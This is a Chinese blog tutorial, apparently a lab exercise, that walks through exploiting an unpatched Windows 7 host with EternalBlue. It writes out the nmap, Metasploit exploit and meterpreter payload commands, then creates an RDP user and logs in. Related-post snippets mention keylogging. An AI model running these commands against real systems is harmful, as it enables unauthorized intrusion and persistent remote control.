kali linux学习(永恒之蓝)

最新推荐文章于 2025-03-21 11:17:56 发布
最新推荐文章于 2025-03-21 11:17:56 发布
阅读量6.6k 收藏 138
点赞数 15
分类专栏: kali 文章标签: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_43727668/article/details/106575127
版权

写在之前

永恒之蓝是2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。

准备工作

pc:windows7(未安装补丁)和kali linux

寻找目标靶机

ifconig#查看本机的ip地址
nmap 192.168.1.0/24#扫描局域网内的其他主机

在这里插入图片描述
以ip为192.168.1.5的主机为靶机

使用msfconsole

msfconsole是一个强大的接口程序是一个一体化的集中控制台。通过msfconsole,你可以访问和使用所有的metasploit的插件,payload,利用模块,post模块等等。

msfconsole#进入msfconsole
use auxiliary/scanner/smb/smb_ms17_010#用来扫描漏洞
show option#查看需要设置的内容

在这里插入图片描述
yes的内容是需要设置的

set rhosts 192.168.1.5
run #执行进行扫描

在这里插入图片描述
在这里插入图片描述来自有道翻译

use exploit/windows/smb/ms17_010_eternalblue#调用永恒之蓝攻击模块
show option

在这里插入图片描述
有些内容已经填写,我们只需要填写靶机的ip地址和攻击方式

set rhost 192.168.1.5
set payload windows/x64/meterpreter/bind_tcp#设置攻击载荷
exploit#执行攻击

在这里插入图片描述

远程登录win7

 run post/windows/manage/enable_rdp #启动enable——rdp脚本
 run post/windows/manage/enable_rdp USERNAME=icbug   PASSWORD=123456#创建用户

在这里插入图片描述
重新创建一个终端

rdesktop 192.168.1.5

在这里插入图片描述
输入刚才创建的账号密码
在这里插入图片描述
至此,我们就通过永恒之蓝这个漏洞,登录到win7系统上了。

整个过程主要是学习了GitChat的博客,最后附上原文的连接:https://blog.youkuaiyun.com/valada/article/details/104190432?utm_medium=distribute.pc_relevant.none-task-blog-baidujs-4

kali linux学习
m0_73271597的博客
10-04 1131
(第四十六课)OpenVAS报告 报告是你工作中最重要的一环。相关工作完成后,但是漏洞扫描程序提供的报告将有助于你了解从哪里开始人手。当我们开始查看漏洞扫描程序报告时,有两件事需要注意。首先,漏洞扫描程序使用特定签名来确定是否存在漏洞。这可能类似于抓取标题来比较版本号。你无法确定该漏洞是否存在,因为OpenVAS等工具不会进行漏洞利用。其次,与之相关的是你可能会得到某些误报。由于漏洞扫描程序未利用此漏洞,因此最好的情况是漏洞获取的概率。 如果你没有使用凭据执行扫描,那么将错过检测很多漏洞。你也许会有更高
永恒之蓝-永恒之蓝漏洞(linux
wrypot的博客
04-02 594
读取到的键盘内容被保存在/root/.msf4/loot/20230402110004_default_192.168.132.129_host.windows.key_145354.txt。然后use auxiliary/scanner/smb/smb_ms17_010 使用载荷,这个不是攻击载荷,这个是查看的有没有漏洞的,然后show options。然后run post/windows/capture/keylog_recorderj就可以监听键盘了。搜索载荷,永恒之蓝的载荷是ms17_010。
kaliLinux初步学习
weixin_44169596的博客
02-13 1476
一、信息收集 信息收集的方式可以分为两种:被动和主动。 被动信息收集方式是指利用第三方的服务对目标进行访问了解,比例:Google搜索。 主动的信息收集方式:通过直接访问、扫描网站,这种将流量流经网站的行为。比如:nmap扫描端口。 被动信息收集的目的:通过公开渠道,去获得目标主机的信息,从而不与目标系统直接交互,避免留下痕迹。 (1)信息收集内容:1.IP地址段2.域名信息3.邮件地址4.文档图片数据5.公司地址6.公司组织架构7.联系电话/传真号码8.人员姓名/职务9.目标系统使用的
最新kali linux入门及常用简单工具从零基础入门到精通,看完这一篇就够了_kali功能介绍
最新发布
喜欢Python编程的程序员柚柚呀
03-21 387
正如刚才所说kali里集成了大量的黑客工具和网络安全相关工具可以说黑客需要做的所有事情在这个系统中都有工具可以实现。下面我推荐几个新手入门可以用到的小工具。
kali Linux——永恒之蓝复刻
sparkleqs的博客
05-16 3206
Metasploit Framework 是一个功能强大的开源安全漏洞检测工具,用于编写、测试和使用 exploit 代码,广泛应用于渗透测试、shellcode 编写和漏洞研究。该框架主要采用面向对象的 Ruby 编程语言编写,并包含由 C 语言、汇编语言和 Python 编写的可选组件。最初的 Metasploit 是用 Perl 编写的,但在后来的版本中改为使用 Ruby 编写。
别再笑话 Windows 了 Linux 出现“永恒之蓝”攻击
weixin_33922670的博客
06-02 163
肆虐全球 Windows 设备的“永恒之蓝”攻击余波未平,一个 Linux 版的“永恒之蓝”又出现了! 5 月 25 日凌晨,360官方博客紧急发布了 Samba 远程代码执行漏洞警报(CVE-2017-7494)。 Samba 是被广泛应用在各种 Linux 和 Unix 系统上的开源共享服务软件,类似于 Windows 上的 SMB 服务。 此前爆发...
kali linux永恒之蓝漏洞利用
weixin_73049307的博客
09-25 891
正常情况下是会出现乱码情况,下一步会有解决方法,之后就可以使用windows系统中的各种cmd命令对win7靶机进行更进一步的各种命令操作了。其中:/home/kali/xkHNYUQa.jpeg为使用主机kali自己的文件路径,c://为目标win7靶机的文件路径。其中:C:/Users/client/Desktop为win7靶机的文件路径,/home/kali为主机kali的文件路径。下图就是成功攻击win7靶机后会出现WIN样式,之后便可以使用一些指令对win7靶机进行操控了。
利用kali Linux复现永恒之蓝(MS17-010)漏洞
YRYUNO_1的博客
01-11 2151
复现永恒之蓝(ms17-010)漏洞,并利用此漏洞控制受害机器进行截屏和远程桌面操作。
Kali Linux演示永恒之蓝漏洞攻击Windows 7
永恒之蓝漏洞演示是一份针对Windows系统的安全技术实践教程,使用Kali Linux作为攻击工具平台,针对MS17_010 Eternal Blue漏洞进行演示。永恒之蓝漏洞(MS17-010)是2017年4月被公开的Windows系统中的一个严重安全...
Kali:永恒之蓝(最基础的攻击指令)
2201_75638644的博客
03-10 614
Kali中利用永痕之蓝漏洞实现最基本对目标靶机的攻击。
kali永恒之蓝
Ryongao
01-15 580
本文章仅限于网络安全教学,严禁用于非法途径。若有人因此作出危害网络安全行为后果自负,与本人无关。
kali Linux全套视频加工具学习资料
04-25
Kali Linux预装了许多渗透测试软件,包括nmap 、Wireshark 、John the Ripper,以及Aircrack-ng.[2] 用户可通过硬盘、live CD或live USB运行Kali LinuxKali Linux既有32位和64位的镜像。可用于x86 指令集。同时还有基于ARM架构的镜像,可用于树莓派和三星的ARM Chromebook
KALI linux学习记录笔记
05-13
KALI linux学习记录笔记 linux入门的笔记,包括常用命令!
kali-linux学习书籍PDF版
03-02
作者:Gilberto Najera-Gutierrez译者:飞龙 协议:CC BY-NC-SA 4.0 我们会涉及如何准备我们的 Kali 以便能够遵循这本书中的秘籍,并使用虚拟机建立带有存在漏洞的 Web 应用的实验室。
kali-linux学习第一章
一个无聊的人
10-09 465
工作不是很忙,有时间的话,当然是要学习新的东西。研究来研究去,我突然发现了一个好玩的东西kali-linux。那么我就开始研究这个东西了。 首先 第一步找到kali-linux的官网:https://www.kali.org/ 第二步安装,我的安装是在我一台很破旧的电脑上,官网上有安装指南。按照指南一步一步安装就好。 第三步当然是熟悉整个的系统。在官网上溜达的时候我发现了个好东西。https://tools.kali.org/tools-listing 这个东西就是kali里提供的所有工具,个人感
一文通透——Kali Linux基础入门_kali linux 新手教程_kali linux jichurumen
2401_84970415的博客
05-13 2078
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
KaLi入门基础
热门推荐
开摆工作室(kbai.cc)
08-24 3万+
我的博客链接:https://blog.kbai.cc/ 学习KaLi ​ ????郑重声明 此文章可能会包含敏感以及危险的命令❗❗❗命令有风险,回车需谨慎。 此文章仅供学习交流与参考使用,禁止运用于任何非法行动或测试中,若有预期之外的后果,将不承担任何责任!! ❌ERHE再次进行警告与提醒! ┌──( root????KaLi-Erhe )-[ ~ ] └─# cat 重要的事情说三遍 ❗❗❗ ⭕命令有风险,回车需谨慎 ❗ ⭕命令有风险,回车需谨慎
Linux(kali)永恒之蓝(ms17-010)漏洞实验
Selma003的博客
04-18 6118
永恒之蓝(ms17-010)漏洞实操。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值